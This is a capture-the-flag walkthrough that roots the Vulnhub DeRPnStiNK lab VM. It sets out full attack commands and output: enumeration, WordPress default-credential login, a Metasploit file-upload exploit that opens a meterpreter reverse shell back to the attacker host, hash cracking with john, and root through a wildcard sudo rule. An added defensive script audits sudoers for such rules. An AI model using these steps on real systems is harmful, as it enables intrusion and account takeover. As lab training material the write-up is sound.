Vulnhub-DeRPnStiNK practice box penetration
Goal: find all four flags.
Target discovery
Since the attacker box is on the same subnet, use arp-scan to find the target:
┌──(root㉿kali)-[/home/kali]
└─# arp-scan 192.168.120.0/24
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ab:50:b1, IPv4: 192.168.120.160
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.120.1 00:50:56:c0:00:08 (Unknown)
192.168.120.2 00:50:56:f6:91:bf (Unknown)
192.168.120.171 00:0c:29:fc:47:76 (Unknown)
192.168.120.254 00:50:56:eb:fd:ce (Unknown)
6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.883 seconds (135.95 hosts/sec). 4 responded
The target IP is therefore 192.168.120.171.
Information gathering
Port scan
Open-port scan:
┌──(root㉿kali)-[/home/kali]
└─# nmap -sS -p- 192.168.120.171 --min-rate=10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-06 05:23 EDT
Nmap scan report for 192.168.120.171
Host is up (0.0018s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:FC:47:76 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 5.40 seconds
Service scan of the open ports:
┌──(root㉿kali)-[/home/kali]
└─# nmap -A -sT -p21,22,80 192.168.120.171
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-06 05:26 EDT
Nmap scan report for 192.168.120.171
Host is up (0.00052s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
| 2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
| 256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_ 256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/php/ /temporary/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: DeRPnStiNK
MAC Address: 00:0C:29:FC:47:76 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.52 ms 192.168.120.171
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.95 seconds
From the above we learn the following:
- 21/ftp is open; anonymous login is not allowed
- 22/ssh is open
- 80/http is open, served by Apache
Directory scan
Run a directory scan against the target site:
┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://192.168.120.171 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,js,asp,aspx,jsp,bak,swp,config,env,json,log,git -t 100 -b 404,400
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.120.171
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404,400
[+] User Agent: gobuster/3.6
[+] Extensions: git,txt,js,jsp,config,env,json,log,php,html,asp,aspx,bak,swp
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/weblog (Status: 301) [Size: 318] [--> http://192.168.120.171/weblog/]
/.html (Status: 403) [Size: 287]
/php (Status: 301) [Size: 315] [--> http://192.168.120.171/php/]
/index.html (Status: 200) [Size: 1298]
/.php (Status: 403) [Size: 286]
/css (Status: 301) [Size: 315] [--> http://192.168.120.171/css/]
/js (Status: 301) [Size: 314] [--> http://192.168.120.171/js/]
/javascript (Status: 301) [Size: 322] [--> http://192.168.120.171/javascript/]
/robots.txt (Status: 200) [Size: 53]
/.html (Status: 403) [Size: 287]
/.php (Status: 403) [Size: 286]
/temporary (Status: 301) [Size: 321] [--> http://192.168.120.171/temporary/]
/server-status (Status: 403) [Size: 295]
Progress: 3308400 / 3308415 (100.00%)
===============================================================
Finished
===============================================================
Several valid paths were found; visit each to check for useful information.
- /index.html

The first flag is in the page source.
PS: the source can also be fetched with curl.

- /robots.txt

- /temporary

Fetching the default page with curl shows that it leaks several paths:

- /webnotes/info.txt

This gives the following:
- a user name: stinky
- a hint that the hosts file must be updated before the blog can be reached: <-- @stinky, make sure to update your hosts file with local DNS so the new derpnstink blog can be reached before it goes live -->
- /weblog
Visiting it redirects automatically to http://derpnstink.local/weblog/, so add this entry to the hosts file:
192.168.120.171 derpnstink.local
- /php/phpmyadmin/
This is the MySQL (phpMyAdmin) login page:

Second directory scan
Run a second directory scan against http://derpnstink.local/weblog/:
┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://derpnstink.local/weblog/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,js,asp,aspx,jsp,bak,swp,config,env,json,log,git -t 100 -b 404,400
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://derpnstink.local/weblog/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404,400
[+] User Agent: gobuster/3.6
[+] Extensions: env,log,html,txt,jsp,config,json,git,php,js,asp,aspx,bak,swp
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/wp-content (Status: 301) [Size: 329] [--> http://192.168.120.171/weblog/wp-content/]
/index.php (Status: 200) [Size: 14674]
/.php (Status: 403) [Size: 293]
/.html (Status: 403) [Size: 294]
/license.txt (Status: 200) [Size: 19935]
/wp-includes (Status: 301) [Size: 330] [--> http://192.168.120.171/weblog/wp-includes/]
/wp-login.php (Status: 200) [Size: 2721]
/readme.html (Status: 200) [Size: 7322]
/wp-admin (Status: 301) [Size: 327] [--> http://192.168.120.171/weblog/wp-admin/]
/xmlrpc.php (Status: 405) [Size: 42]
/.html (Status: 403) [Size: 294]
/.php (Status: 403) [Size: 293]
/wp-signup.php (Status: 302) [Size: 0] [--> http://derpnstink.local/weblog/wp-login.php?action=register]
Progress: 3308400 / 3308415 (100.00%)
===============================================================
Finished
===============================================================
After some trying, the /readme.html page turns out to state that the default password is admin:

Logging in at /wp-login.php with admin:admin succeeds:

The CMS is also identified:

Since it is WordPress, wpscan can be used to check its components for known vulnerabilities.
wpscan vulnerability scan
After obtaining an API token from the wpscan site, scan with wpscan:
wpscan --url 'http://derpnstink.local/weblog/' --api-token '7JsD……GC0Q' > result.txt
A large number of component vulnerabilities are reported:

One of them, an arbitrary file upload, is used:
| [!] Title: Slideshow Gallery < 1.4.7 - Arbitrary File Upload
| Fixed in: 1.4.7
| References:
| - https://wpscan.com/vulnerability/b1b5f1ba-267d-4b34-b012-7a047b1d77b2
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5460
| - https://www.exploit-db.com/exploits/34681/
| - https://www.exploit-db.com/exploits/34514/
| - https://seclists.org/bugtraq/2014/Sep/1
| - https://packetstormsecurity.com/files/131526/
| - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_slideshowgallery_upload/
Getting a shell
Search msf for CVE-2014-5460, set the required options, and run the module:
msf6 > search CVE-2014-5460
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/wp_slideshowgallery_upload 2014-08-28 excellent Yes Wordpress SlideShow Gallery Authenticated File Upload
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/wp_slideshowgallery_upload
msf6 > use 0
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > show options
Module options (exploit/unix/webapp/wp_slideshowgallery_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasplo
it.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
VHOST no HTTP server virtual host
WP_PASSWORD yes Valid password for the provided username
WP_USER yes A valid username
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.120.160 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 WP SlideShow Gallery 1.4.6
View the full module info with the info, or info -d command.
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > set rhosts 192.168.120.171
rhosts => 192.168.120.171
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > set wp_user admin
wp_user => admin
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > set wp_password admin
wp_password => admin
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > set vhost derpnstink.local
vhost => derpnstink.local
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > set targeturi /weblog/
targeturi => /weblog/
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > show options
Module options (exploit/unix/webapp/wp_slideshowgallery_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.120.171 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metaspl
oit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /weblog/ yes The base path to the wordpress application
VHOST derpnstink.local no HTTP server virtual host
WP_PASSWORD admin yes Valid password for the provided username
WP_USER admin yes A valid username
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.120.160 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 WP SlideShow Gallery 1.4.6
View the full module info with the info, or info -d command.
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > run
[*] Started reverse TCP handler on 192.168.120.160:4444
[*] Trying to login as admin
[*] Trying to upload payload
[*] Uploading payload
[*] Calling uploaded file lythtccp.php
[*] Sending stage (40004 bytes) to 192.168.120.171
[+] Deleted lythtccp.php
[*] Meterpreter session 1 opened (192.168.120.160:4444 -> 192.168.120.171:34882) at 2025-04-06 07:11:54 -0400
meterpreter > shell
Process 2680 created.
Channel 0 created.
python -c 'import pty;pty.spawn("/bin/bash")'
</html/weblog/wp-content/uploads/slideshow-gallery$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Shell obtained.
List the users under /home:
www-data@DeRPnStiNK:/var/www/html/weblog$ ls /home
ls /home
mrderp stinky
Two users are found.
SQL information gathering
A configuration file was found in the web root:

It contains the database configuration, including the root user's credentials:

Login succeeds:

Checking the conditions for UDF privilege escalation
Kernel privilege escalation against the target did not work; since we now hold the MySQL root credentials, check whether UDF privilege escalation is feasible:
1. MySQL running with root privileges
2. Whether secure_file_priv is set to a specific path rather than being NULL:
# query secure_file_priv
mysql> show global variables like 'secure%';
show global variables like 'secure%';
+------------------+-----------------------+
| Variable_name | Value |
+------------------+-----------------------+
| secure_auth | OFF |
| secure_file_priv | /var/lib/mysql-files/ |
+------------------+-----------------------+
2 rows in set (0.31 sec)
This shows that files cannot be read or written at arbitrary locations, only inside the specified directory, so UDF cannot be used.
3. Check the plugin directory:
mysql> show variables like '%plugin%';
show variables like '%plugin%';
+---------------+------------------------+
| Variable_name | Value |
+---------------+------------------------+
| plugin_dir | /usr/lib/mysql/plugin/ |
+---------------+------------------------+
1 row in set (0.00 sec)
4. Check whether remote login is possible:
mysql> use mysql;
Database changed
mysql> select user,host from user;
+------------------+------------------+
| user | host |
+------------------+------------------+
| root | 127.0.0.1 |
| root | ::1 |
| root | derpnstink |
| unclestinky | derpnstink.local |
| debian-sys-maint | localhost |
| phpmyadmin | localhost |
| root | localhost |
+------------------+------------------+
7 rows in set (0.00 sec)
Remote login is not permitted, so the MSF approach to privilege escalation is out as well.
Go back to the database login page found during information gathering and log in with the obtained credentials:

In the wp_users table another user, unclestinky, was found along with a password hash: $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
Crack it with john:
┌──(root㉿kali)-[/home/kali/Templates]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt 1.hash
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
wedgie57 (?)
1g 0:00:02:56 DONE (2025-04-06 09:01) 0.005657g/s 15818p/s 15818c/s 15818C/s wedner12..wederliy1997
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed.
This yields a credential: unclestinky:wedgie57
Logging into the platform with this account reveals flag2:

SSH login
Try to log in over SSH, but the server does not accept password authentication:

FTP login
Try FTP login with the two users found earlier and the one password obtained so far:
┌──(root㉿kali)-[/home/kali/Templates]
└─# ftp 192.168.120.171
Connected to 192.168.120.171.
220 (vsFTPd 3.0.2)
Name (192.168.120.171:kali): mrderp
530 Permission denied.
ftp: Login failed
ftp> quit
221 Goodbye.
┌──(root㉿kali)-[/home/kali/Templates]
└─# ftp 192.168.120.171
Connected to 192.168.120.171.
220 (vsFTPd 3.0.2)
Name (192.168.120.171:kali): stinky
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||46863|).
150 Here comes the directory listing.
drwxr-xr-x 5 1001 1001 4096 Nov 12 2017 files
226 Directory send OK.
ftp> quit
221 Goodbye.
One of the users logs in successfully, and there are some files:
ftp> ls
229 Entering Extended Passive Mode (|||47277|).
150 Here comes the directory listing.
drwxr-xr-x 2 1001 1001 4096 Nov 12 2017 network-logs
drwxr-xr-x 3 1001 1001 4096 Nov 12 2017 ssh
-rwxr-xr-x 1 0 0 17 Nov 12 2017 test.txt
drwxr-xr-x 2 0 0 4096 Nov 12 2017 tmp
226 Directory send OK.
ftp> get test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||44009|).
150 Opening BINARY mode data connection for test.txt (17 bytes).
100% |***********************************************************************************************| 17 0.03 KiB/s 00:00 ETA
226 Transfer complete.
17 bytes received in 00:00 (0.03 KiB/s)
ftp> cd ssh
250 Directory successfully changed.
ftp> cd ssh
250 Directory successfully changed.
ftp> cd ssh
250 Directory successfully changed.
ftp> cd ssh
250 Directory successfully changed.
ftp> cd ssh
250 Directory successfully changed.
ftp> cd ssh
250 Directory successfully changed.
ftp> cd ssh
250 Directory successfully changed.
ftp> cd ssh
550 Failed to change directory.
ftp> pwd
Remote directory: /files/ssh/ssh/ssh/ssh/ssh/ssh/ssh
ftp> ls
229 Entering Extended Passive Mode (|||44034|).
150 Here comes the directory listing.
-rwxr-xr-x 1 0 0 1675 Nov 13 2017 key.txt
226 Directory send OK.
ftp> get key.txt
local: key.txt remote: key.txt
229 Entering Extended Passive Mode (|||41298|).
150 Opening BINARY mode data connection for key.txt (1675 bytes).
100% |***********************************************************************************************| 1675 49.96 KiB/s 00:00 ETA
226 Transfer complete.
1675 bytes received in 00:00 (48.40 KiB/s)
ftp> cd network-logs
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||48682|).
150 Here comes the directory listing.
-rwxr-xr-x 1 0 0 719 Nov 12 2017 derpissues.txt
226 Directory send OK.
ftp> get derpissues.txt
local: derpissues.txt remote: derpissues.txt
229 Entering Extended Passive Mode (|||42449|).
150 Opening BINARY mode data connection for derpissues.txt (719 bytes).
100% |***********************************************************************************************| 719 53.00 KiB/s 00:00 ETA
226 Transfer complete.
719 bytes received in 00:00 (48.92 KiB/s)
ftp> quit
221 Goodbye.
test.txt contains nothing useful; key.txt is a private key that can be used to log in; derpissues.txt contains some text:
┌──(root㉿kali)-[/home/kali/Templates]
└─# cat key.txt
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----
┌──(root㉿kali)-[/home/kali/Templates]
└─# cat test.txt
vsftpd test file
┌──(root㉿kali)-[/home/kali/Templates]
└─# strings derpissues.txt
12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
12:07 stinky: yeah. did you need a password reset?
12:07 mrderp: I think i accidently deleted my account
12:07 mrderp: i just need to logon once to make a change
12:07 stinky: im gonna packet capture so we can figure out whats going on
12:07 mrderp: that seems a bit overkill, but wtv
12:08 stinky: commence the sniffer!!!!
12:08 mrderp: -_-
12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
12:11 mrderp: awesome it works!
12:12 stinky: we really are the best sysadmins #team
12:13 mrderp: i guess we are...
12:15 mrderp: alright I made the changes, feel free to decomission my account
12:20 stinky: done! yay
From the information gathered earlier, the two people in this chat are exactly the users in the target's /home directory.
SSH login with the key
┌──(root㉿kali)-[/home/kali/Templates]
└─# ssh -o PubkeyAcceptedAlgorithms=+ssh-rsa -i key.txt stinky@192.168.120.171
Ubuntu 14.04.5 LTS
[ASCII-art "Derrrrrp N Stink" login banner; its layout was lost in extraction]
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)
* Documentation: https://help.ubuntu.com/
331 packages can be updated.
231 updates are security updates.
New release '16.04.7 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Mon Nov 13 00:31:29 2017 from 192.168.1.129
stinky@DeRPnStiNK:~$ id
uid=1001(stinky) gid=1001(stinky) groups=1001(stinky)
The target's old OpenSSH only offers the ssh-rsa (SHA-1) public-key signature algorithm, which newer OpenSSH clients disable by default, so it has to be re-enabled explicitly:
-o PubkeyAcceptedAlgorithms=+ssh-rsa
After logging in, however, sudo and the other privilege-escalation methods lead nowhere.
Finding the packet capture
From derpissues.txt we know a packet capture exists, so search for .pcap files from the shell:
stinky@DeRPnStiNK:~$ find / -type f -iname '*.pcap' 2>/dev/null
/home/stinky/Documents/derpissues.pcap
Open it in Wireshark and, following the conversation in derpissues.txt, search for password-related content (pass):

This reveals mrderp's login credential: derpderpderpderpderpderpderp
Login succeeds:
┌──(root㉿kali)-[/home/kali/Templates]
└─# ssh mrderp@192.168.120.171
Ubuntu 14.04.5 LTS
mrderp@192.168.120.171's password:
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)
* Documentation: https://help.ubuntu.com/
500 packages can be updated.
415 updates are security updates.
New release '16.04.7 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Mon Nov 13 01:03:13 2017 from 192.168.1.129
mrderp@DeRPnStiNK:~$ id
uid=1000(mrderp) gid=1000(mrderp) groups=1000(mrderp)
Privilege escalation
mrderp@DeRPnStiNK:~$ sudo -l
[sudo] password for mrderp:
Matching Defaults entries for mrderp on DeRPnStiNK:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User mrderp may run the following commands on DeRPnStiNK:
(ALL) /home/mrderp/binaries/derpy*
Meaning:
(ALL): the user may run the command that follows as any user, including root. /home/mrderp/binaries/derpy*: user mrderp may run with sudo any command in /home/mrderp/binaries/ whose name begins with derpy.
So we can simply create an executable whose name starts with derpy in /home/mrderp/binaries/:
mrderp@DeRPnStiNK:~$ cd /home/mrderp/
mrderp@DeRPnStiNK:~$ mkdir binaries
mrderp@DeRPnStiNK:~$ cd binaries/
mrderp@DeRPnStiNK:~/binaries$ echo '/bin/bash' > derpy.sh
mrderp@DeRPnStiNK:~/binaries$ chmod +x derpy.sh
mrderp@DeRPnStiNK:~/binaries$ sudo ./derpy.sh
root@DeRPnStiNK:~/binaries# id
uid=0(root) gid=0(root) groups=0(root)
Root shell obtained.
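As an added example that is not part of the original writeup, the following Python audit script reads sudoers-style rules and flags the two weaknesses this rule combines: a glob wildcard in the command path, and a path inside the user's own home directory (here the binaries directory did not even exist until mrderp created it). The sample sudoers text is constructed; the mrderp line mirrors the rule shown by sudo -l above, and the other lines are made up to show what does not get flagged.

```python
import re

# Constructed sample sudoers content; the mrderp line mirrors the rule from `sudo -l` above
SAMPLE_SUDOERS = """\
Defaults env_reset, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
root    ALL=(ALL:ALL) ALL
mrderp  ALL=(ALL) /home/mrderp/binaries/derpy*
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, /opt/backup/run-backup.sh
alice   ALL=(ALL) /usr/local/bin/derpy-status
"""

# user  host = (runas) commands     -- the runas part is optional
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
TAG_RE = re.compile(r"^(?:NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|LOG_INPUT|LOG_OUTPUT):\s*", re.I)


def user_controlled(path: str, user: str) -> bool:
    """True when the command path lives under the rule's own user home, where the user can create files."""
    return path.startswith(f"/home/{user}/")


def audit_sudoers(text: str) -> list[dict]:
    """Flag command specs that contain glob characters or point into the user's home directory."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        user = m.group("user")
        for cmd in m.group("cmds").split(","):
            cmd = TAG_RE.sub("", cmd.strip())         # strip NOPASSWD: and similar tags
            path = cmd.split()[0] if cmd else ""
            if path == "ALL":                         # root-style "ALL" is a policy decision, not a typo
                continue
            reasons = []
            if re.search(r"[*?\[]", path):
                reasons.append("wildcard in command path: any file matching the pattern is allowed")
            if user_controlled(path, user):
                reasons.append("command lives under the user's home: the user can create or replace it")
            if reasons:
                findings.append({"user": user, "runas": m.group("runas") or user,
                                 "cmd": cmd, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{f['user']} -> ({f['runas']}) {f['cmd']}")
        for r in f["reasons"]:
            print("   -", r)
```

The fix for a rule like mrderp's is an exact path to a root-owned binary outside any user-writable directory, with no wildcard.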
Collecting the remaining flags
root@DeRPnStiNK:~/binaries# find / -type f -iname 'flag*' 2>/dev/null
/home/stinky/Desktop/flag.txt
/root/Desktop/flag.txt
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/eth0/flags
/sys/devices/virtual/net/lo/flags
root@DeRPnStiNK:~/binaries# cat /home/stinky/Desktop/flag.txt
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)
root@DeRPnStiNK:/root/Desktop# cat flag.txt
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)
Congrats on rooting my first VulnOS!
Hit me up on twitter and let me know your thoughts!
@securekomodo
Summary
Information gathering is what matters: piecing together what has already been found shows where the next step can start.

